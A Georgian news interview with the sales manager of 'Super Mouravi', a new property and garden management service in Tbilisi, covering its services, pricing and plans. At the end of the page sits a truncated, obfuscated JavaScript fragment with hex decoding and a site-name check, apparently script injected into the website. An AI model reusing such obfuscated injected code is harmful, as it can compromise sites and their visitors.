გოგი ლორთქიფანიძეეკონომიკამთავარი ბლოკი

სუპერ მოურავი – ახალი შეთავაზება ქართულ ბაზარზე

ერთი თვეა რაც ქართულ ბაზარზე გამოჩნდა თვისობრივად ახალი და კომპლექსური მომსახურება, რომელსაც შპს “პარტნიორი“ თავაზობს მომხმარებელს. „სუპერ მოურავი“ – ასე ეწოდება ახალ პროდუქტს.

„სუპერ მოურავი“ ეს არის კომპლექსური ბიზნეს – სერვისი, როგორც ორგანიზაციებისათვის ასევე კერძო სახლებისა და აგარაკების მფლობელებისთვის. „სუპერ მოურავი“ ხელმძღვანელობს, გეგმავს და პასუხისმგებელია დამკვეთისადმი ხელშეკრულებით გათვალისწინებული მომსახურების პაკეტის მიწოდებაზე.

„სუპერ მოურავის“ მომსახურების პაკეტში შედის: ყველა სახის საბაღე და მიწის სამუშაოები;ხელოსნები და სარემონტო სამუშაოები; დენდროლოგიური, აგროქიმიური და აგროტექნიკური სამუშაოები; ობიექტის ინფრასტრუქტურის მოწესრიგება;დასუფთავება და ნარჩენების გატანა;საყოფაცხოვრებო და საოჯახო დავალებები (ეს უკანასკნელი მხოლოდ ფიზიკური პირებისთვის არის გათვალისწინებული).

დაწვრილებითი ინფორმაციის მოპოვების და მომხმარებლის გათვიცნობიერების მიზნით „Fact2.ge“-ი გაესაუბრა „სუპერ მოურავის“ გაყიდვების მენეჯერს ბ-ნ თორნიკე კაპანაძეს

– ბ-ნო თორნიკე, პირველ რიგში რატომ „სუპერ მოურავი“?

– ჩვენი მომსახურება ძალიან ახლოს დგას ტრადიციული ქართული „მოურავის“ შინაარსთან. მოგეხსენებათ, რომ სწორედ მოურავის ფუნქცია იყო ეხელმძღვანელა და მოეგვარებინა მამულისთვის საჭირო ყველა სამეურნეო თუ საყოფაცხოვრებო პრობლემა და წესრიგში ქონოდაროგორც მეურნეობა, ისე კარ-მიდამო. ჩვენც სწორედ ამას ვთავაზობთ ჩვენს მომხმარებელს. ყველას ვინც ისარგებლებს ჩვენი პროდუქტით ეყოლება თავისი პირადი მოურავი, რომელიც პასუხისმგებელი იქნება ხელშეკრეულებით გათვალისწინებული მომსახურებების პირუთვნელად შესრულებაზე. რაც შეეხება „სუპერს“, ეს სიტყვა ჩვენთვის ყველასთვის კარგად ცნობილი კომპიუტერული თამაშის „სუპერ მარიოს“ ასოციაციიდან მოვიდა და ჩვენც ჩავთვალეთ საჭიროდ, ცოტა უფრო მხიარული და კრეატიული დატვირთვა მიგვეცა მომსახურების პაკეტისათვის, ასე გაჩნდა „სუპერ მოურავი“.

-თქვენი მომსახურება მხოლოდ სააბონენტო ტიპის არის თუ შესაძლებელია მომხმრებელმა ერთი ან რამოდენიმე სერვისიც დაგიკვეთოთ ერთჯერადად?

-ჩვენი მომსახურება დივერსიფიცირებულია და ითვალისწინებს როგორც ერთჯერად ისე სააბონენტო სახის მომსახურებას. ერთჯერადი მომსახურების ფასები განსაზღვრულია ჩვენი შეთავაზებით, ხოლო სააბონენტო მომსახურების ღირებულება განისაზღვრება ინდივიდუალურად ორგანიზაციის /სახლის/აგარაკის, მოსავლელი მიწის ნაკვეთის ფართობის და არჩეული მომსახურეობების რაოდენობიდან და სპეციფიკიდან გამომდინარე.

– მაინც, უფრო კარგად რომ განგვიმარტოთ, რას ითვალისწინებს სააბონენტო მომსახურეობა?

– სააბონენტო მომსახურეობით გათავლისწინებულია: ინსპექტირება და რეპორტი სააბონენტო ობიექტის მდგომარეობის შესახებ; ეზოს დასუფთავება, გათიბვა, საბაღე და სხვა სახის ნარჩენების გატანა; ფორს-მაჟორის შემთხვევაში ხელოსნის გადაუდებელი უფასო გამოძახება; პროფილაქტიკური სამუშაოების დაგეგმვა; ხელშეკრულებით წინასწარ განსაზღვრული მომსახურეობების მიწოდება.

-თქვენი მომსახურების არეალი მხოლოდ თბილისით და მისი შემოგარენით შემოიფარგლება?

– ჯერ-ჯერობით მხოლოდ თბილისი და შემოგარენი, დახლოებით 20 კმ-ის ფარგლებში. თუმცა უკვე გვქონდა შემოხმიანება მომსახურებაზე თელავიდან, კასპიდან, რაც ალბათ მომავალში რეგიონალური ფილიალების გახსნის საჭიროებასაც განაპირობებს.

– და ბოლოს, თქვენი მომსახურება ჯერ ახალია ბაზარზე და ალბათ ანალოგიც არ გეყოლებათ, წესით მომხმარებელიც დაინტერესდება ამ სერვისით, მაგრამ ცნობილი გამონათქვამისა არ იყოს – ყველაფერს კადრები წყვეტენ. ამ მხრივ როგორ გაქვთ საქმე ?

– მომსახურების ასეთი ფორმატი მართლაც ახალია ბაზარზე და მომხმარებელის მხრიდან მხოლოდ პოზიტიური გამოხმაურებაამსგავსი სერვისის შეთავაზებისთვის, ჯერ მხოლოდ ორი კვირაა რაც ვოპერირებთ და შეკვეთების ზრდის დინამიკა საკმაოდ იმედის მომცემია. რაც შეეხება კადრებს, ამ მხრივ მართლაც შეგვიძლია ვთქვათ, რომ ჩვენი თანამშრომლების კვალიფიკაცია და გამოცდილება ჩვენი ძირითადი პლიუსია. ჩვენს გუნდში არიან როგორც ძველი, გამოცდილი პროფესიონალები ისე ახალგაზრდა და პერსპექტიული სპეციალისტები, რაც განაპირობებს ჩვენი სერვისის კვალიფიციურობას, სისწრაფეს და ხარისხიანობას.
-მადლობა ამომწურავი ინფორმაციის მოწოდებისათვის. წარმატებებს გისურვებთ.

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “fact2.ge”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

ტეგები
იხილეთ მეტი

მსგავსი სიახლეები